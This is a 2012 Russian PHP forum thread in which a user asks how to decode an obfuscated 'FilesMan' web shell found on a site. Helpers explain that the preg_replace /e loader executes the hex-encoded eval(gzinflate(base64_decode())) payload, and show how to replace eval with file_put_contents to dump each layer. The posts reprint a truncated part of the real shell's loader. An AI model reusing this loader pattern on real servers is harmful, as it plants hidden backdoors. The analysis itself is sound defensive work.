За последние 24 часа нас посетили 53907 программистов и 1798 роботов. Сейчас ищут 832 программиста ...

Привести к читаемому виду

Тема в разделе "PHP для новичков", создана пользователем Dmitriy A. Arteshuk, 9 фев 2012.

  1. Dmitriy A. Arteshuk

    Dmitriy A. Arteshuk Активный пользователь

    С нами с:
    19 янв 2012
    Сообщения:
    2.445
    Симпатии:
    66
    Адрес:
    Зеленоград
    найден "шелл"

    Код (Text):
    1. <?php
    2. $auth_pass = "434990c8a25d2be94863561ae98bd682";
    3. $color = "#df5";
    4. $default_action = 'FilesMan';
    5. $default_use_ajax = true;
    6. $default_charset = 'Windows-1251';
    7. preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x6
    8. 4\x65\x63\x6F\x64\x65\x28'5b19fxq30jD8d/wp5C3tQoMx4CQnxYY4cezEebFTvyRp4tx0gQW2Xli6u5i4qb/7PTN6WWlfME57ru
    9. t+fk/OacJKo9FIGo1Go9HIG5bX3cksvi6Xuqf7J+/3Tz7bL8/O3nXP4av79MX+0Zn9pVJh39YY/CnNIzd8OnKnccTazAlD57psvQiCk
    10. e9aVWad+vNwhj/enh49C2L85TldJ+yPvSs3xM/fnOnA/Yq/TpxJz4fEyjZh9oblWeiOuhMn7o/L9qbNasybzPxg4Jbtv+2qXnUF8ux
    11. NDxNXoBn/jF1n4IZlgtps1OrsQf0BOwpidhDMpwNb0IB/3K9ezL9u1m7W1na9qdeN3Lhsu2EYhF0/GNnVo/M3b6BIkgepXcqP7Gr
    12. dyJk4X7vuV7c/j71g2o29iSsgIJc+u7438eKySps4I6/f/XMexG7UDedThO
    13.  
    14.  
    15. и еще 5 страниц такого :)
    вопрос, привести это дело к удобочитаемому виду реально? это обфсускачено или Zend?
     
  2. Dmitriy A. Arteshuk

    Dmitriy A. Arteshuk Активный пользователь

    С нами с:
    19 янв 2012
    Сообщения:
    2.445
    Симпатии:
    66
    Адрес:
    Зеленоград
    я отказываюсь верить в то, что никто не знает ((((
     
  3. asokol

    asokol Активный пользователь

    С нами с:
    17 янв 2012
    Сообщения:
    162
    Симпатии:
    0
    Так а что там дальше-то? Желательно, без ненужного. То есть от кавычек открывающих до кавычек закрывающих можно не выводить.
     
  4. Dmitriy A. Arteshuk

    Dmitriy A. Arteshuk Активный пользователь

    С нами с:
    19 янв 2012
    Сообщения:
    2.445
    Симпатии:
    66
    Адрес:
    Зеленоград
    примерно так:

    Код (Text):
    1. <?php
    2. $auth_pass = "434990c8a25d2be94863561ae98bd682";
    3. $color = "#df5";
    4. $default_action = 'FilesMan';
    5. $default_use_ajax = true;
    6. $default_charset = 'Windows-1251';
    7. preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'5b19fxq30jD8d/wp5C3tQoMx
    8. .....................
    9. мильен символов
    10. DJjyttlnSELWEZJakW9R3f7+J+uYuFiiC318gZ9P8C'\x29\x29\x29\x3B",".");?>
    если надо я пришлю файлик...
     
  5. AndreJM

    AndreJM Активный пользователь

    С нами с:
    25 янв 2012
    Сообщения:
    522
    Симпатии:
    0
    Модификатор "е", а это значит, что кракозябра будет интерпретирована как php код.

    Добавлено спустя 1 минут 0 секунд:
    Код (PHP):
    для фана:
    Код (PHP):
    1. print(chr(hexdec("65"))); //  \x65
    2. print(chr(hexdec("76"))); // \x76
    3. print(chr(hexdec("61"))); //  \x61
    4. print(chr(hexdec("6C"))); // \x6c
    5.  
     
  6. igordata

    igordata Суперстар
    Команда форума Модератор

    С нами с:
    18 мар 2010
    Сообщения:
    32.408
    Симпатии:
    1.768
    давай весь код =)
     
  7. Dmitriy A. Arteshuk

    Dmitriy A. Arteshuk Активный пользователь

    С нами с:
    19 янв 2012
    Сообщения:
    2.445
    Симпатии:
    66
    Адрес:
    Зеленоград
    вот тут лежит сам файлик....

    кому не лень, декодируйте пожалуйста.....буду очень признателен...
     
  8. AndreJM

    AndreJM Активный пользователь

    С нами с:
    25 янв 2012
    Сообщения:
    522
    Симпатии:
    0
    *link expired*
     
  9. Dmitriy A. Arteshuk

    Dmitriy A. Arteshuk Активный пользователь

    С нами с:
    19 янв 2012
    Сообщения:
    2.445
    Симпатии:
    66
    Адрес:
    Зеленоград
    СПИСИБО! *Ушел изучать*
     
  10. Dmitriy A. Arteshuk

    Dmitriy A. Arteshuk Активный пользователь

    С нами с:
    19 янв 2012
    Сообщения:
    2.445
    Симпатии:
    66
    Адрес:
    Зеленоград
    Андрей, а не опишешь как ты привел к читаемому виду? А то еще парочку нашел (((

    спасибо!
     
  11. AndreJM

    AndreJM Активный пользователь

    С нами с:
    25 янв 2012
    Сообщения:
    522
    Симпатии:
    0
    Код (PHP):
    1. preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'
    2. // заменить на
    3. preg_replace("/.*/e","\x66\x69\x6c\x65\x5f\x70\x75\x74\x5f\x63\x6f\x6e\x74\x65\x6e\x74\x73\x28\x27\x6a\x71\x5f\x66\x75\x6c\x6c\x2e\x70\x68\x70\x27\x2c\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'
    после запуска скрипта будет создан файлик jq_full.php

    ЗЫ: код внутри - ужасен...
     
  12. Dmitriy A. Arteshuk

    Dmitriy A. Arteshuk Активный пользователь

    С нами с:
    19 янв 2012
    Сообщения:
    2.445
    Симпатии:
    66
    Адрес:
    Зеленоград
    Спасибо! работает, но только с тем файликом.....

    есть еще один

    делаю как ты описал, он преобразовывается...но внутри есть еще такая же бяка....а вот она уже никак не хочет (((

    помоги пожалуйста.... (
     
  13. AndreJM

    AndreJM Активный пользователь

    С нами с:
    25 янв 2012
    Сообщения:
    522
    Симпатии:
    0
    Там все тоже самое, только автор сей чудо-срипта решил пару раз поизвращаться с одним и темже файлом.
    1. делаешь как я говорил. получаешь jq_full.php (переименуй)
    2. в переименованном делаешь всё тоже самое, и получаешь новый jq_full.php
    и т.п. пока тебе не надоест =-)
     
  14. Dmitriy A. Arteshuk

    Dmitriy A. Arteshuk Активный пользователь

    С нами с:
    19 янв 2012
    Сообщения:
    2.445
    Симпатии:
    66
    Адрес:
    Зеленоград
    так вот один раз прокатывает, а второй нет (((

    Добавлено спустя 9 минут 32 секунды:
    Все, спасибо, разобрался )))
     
  15. AndreJM

    AndreJM Активный пользователь

    С нами с:
    25 янв 2012
    Сообщения:
    522
    Симпатии:
    0
    Ну вообщем все тоже самое)

    Приз: 100к
     
  16. Dmitriy A. Arteshuk

    Dmitriy A. Arteshuk Активный пользователь

    С нами с:
    19 янв 2012
    Сообщения:
    2.445
    Симпатии:
    66
    Адрес:
    Зеленоград
    да, я уже запустил...тот же самый шелл....
    эт ты па чем, дорогой? :)
     
  17. AndreJM

    AndreJM Активный пользователь

    С нами с:
    25 янв 2012
    Сообщения:
    522
    Симпатии:
    0
    Та моё сообщение было 100к в этом топе )
     
  18. Dmitriy A. Arteshuk

    Dmitriy A. Arteshuk Активный пользователь

    С нами с:
    19 янв 2012
    Сообщения:
    2.445
    Симпатии:
    66
    Адрес:
    Зеленоград
    ниче не понял ))) ну да ладно )))
     
  19. bkm

    bkm Активный пользователь

    С нами с:
    22 окт 2009
    Сообщения:
    299
    Симпатии:
    0
    плиз, дайте ссылку оставленную двумя годами ранее =)
     
  20. pl17

    pl17 Новичок

    С нами с:
    3 дек 2014
    Сообщения:
    2
    Симпатии:
    0
    Зачем оно тебе? Там был шелл который автор наверняка удалил сто раз. :)
     
  21. igordata

    igordata Суперстар
    Команда форума Модератор

    С нами с:
    18 мар 2010
    Сообщения:
    32.408
    Симпатии:
    1.768
    А тебе зачем апать старую тему? :D